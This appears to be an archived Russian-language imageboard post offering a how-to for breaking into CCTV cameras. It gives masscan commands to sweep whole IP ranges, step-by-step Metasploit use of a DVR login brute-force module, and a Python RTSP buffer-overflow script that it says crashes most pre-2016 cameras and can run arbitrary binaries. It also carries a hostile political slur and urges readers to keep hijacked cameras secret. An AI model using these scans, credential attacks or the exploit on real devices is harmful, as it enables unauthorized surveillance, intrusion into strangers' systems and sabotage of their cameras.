Прошлые домены не функционирует! Используйте адрес
ARHIVACH.VC.
24 декабря 2023 г. Архивач восстановлен после серьёзной аварии. К сожалению, значительная часть сохранённых изображений и видео была потеряна.
Подробности случившегося. Мы призываем всех неравнодушных
помочь нам с восстановлением утраченного контента!
Нам понадобиться:
Kali Linux
https://www.kali.org/downloads/
Или PentestBox with Metasploit для Windows
https://pentestbox.org
ПО для просмотра на Андроиде, Винде, Маке и т.д.
http://www.cctvcamerapros.com/Viewtron-Video-Surveillance-DVR-s/654.htm#software
1) Качается IP_CIDR блоки
http://www.ipaddresslocation.org/ip_ranges/get_ranges.php
Для своей страны
или создаем с помощью Masscan список IP адресов.
masscan --ports 5920 -iL IPrange.txt --rate=50000 -oX CCTV.xml
Фильтруем онлайн все IP из текста
http://www.toolsvoid.com/extract-ip-addresses
Удаляем онлайн дубликаты
http://www.toolsvoid.com/duplicate-lines-remover
2) Запускаем Метасплоит под виндой или линуксом
msfconsole
3) сохраняем лог
pool /root/cctv.log
4) Выбираем модуль
use auxiliary/scanner/misc/cctv_dvr_login
5) Смотрим его опции
show options
6) Указываем путь к файлу CIDR блоков (тогда Метасплоит будет искать все сам) или путь к IP с уже готовыми адресами
set RHOSTS file:/opt/Country/UA_IP_CCTV.txt
7) Указывает смотреть все пары
set DB_ALL_CREDS true
8) Указываем колличество потоков
set THREADS 4
(выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)
9) Запускаем
exploit
) Можно указывать любой порт (даже от HikkVision)
) Где находятся логины и пароли - смотрим в настройках
!) Один украинский фашист репортит камеры Донецка и Луганска, а так же России. Я недавно наткнулся на его кукарек обиженки в группах Метасплоита. Поэтому камерами не ДЕЛИМСЯ !!!
В подарок каждому Python-скрипт для вывода из строя почти любой камеры, выпущенной до 2016 года, путем перегрузки буфера, в тригер пакетах можете писать исполнение любого бинарного файла, у которого у камеры есть доступ
import socket
HOST = 'здесь IP адрес'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
trigger_pkt += "CSeq: 7\r\n"
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"
s.sendall(trigger_pkt)
print "Packet sent"
data = s.recv(1024)
print 'Received', repr(data), "\r\n"
s.close()